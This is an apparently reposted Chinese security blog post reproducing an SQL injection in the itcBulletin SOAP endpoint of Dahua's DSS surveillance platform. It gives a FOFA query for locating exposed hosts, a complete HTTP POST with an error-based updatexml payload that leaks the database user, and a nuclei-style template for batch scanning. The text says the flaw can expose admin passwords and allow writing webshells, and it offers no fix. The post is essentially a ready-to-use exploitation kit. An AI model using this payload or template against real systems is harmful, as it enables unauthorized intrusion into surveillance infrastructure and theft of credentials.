大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

admin 2024年1月7日21:20:38评论63 views字数 1602阅读5分20秒阅读模式
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

漏洞描述

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

    

大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

漏洞复现

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

第一步、使用下面fofa语句进行资产收集,确认测试目标

fofa语句body="<meta http-equiv="refresh" content="1;url='/admin'"></span>" || body="dahuaDefined/headCommon.js" || title=="DSS"

第二步、漏洞首页

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

第三步、使用burp抓取当前页面数据包...将数据包发送到repeater中修改数据包进行测试

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: ipAccept-Encoding: gzipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 335
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> <s11:Body> <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> <netMarkings> (updatexml(1,concat(0x7e,user(),0x7e),1))) and (1=1 </netMarkings> </ns1:deleteBulletin> </s11:Body></s11:Envelope>

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

批量脚本

大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
id: template-id
info: name: Template Name author: kali severity: high description: description reference: - https:// tags: tags
requests: - raw: - |- POST /portal/services/itcBulletin?wsdl HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 335
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> <s11:Body> <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> <netMarkings> (updatexml(1,concat(0x7e,user(),0x7e),1))) and (1=1 </netMarkings> </ns1:deleteBulletin> </s11:Body> </s11:Envelope> matchers-condition: and matchers: - type: word part: body words: - 'soap'

原文始发于微信公众号(揽月安全团队):大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日21:20:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现https://cn-sec.com/archives/2372837.html

发表评论

匿名网友 填写信息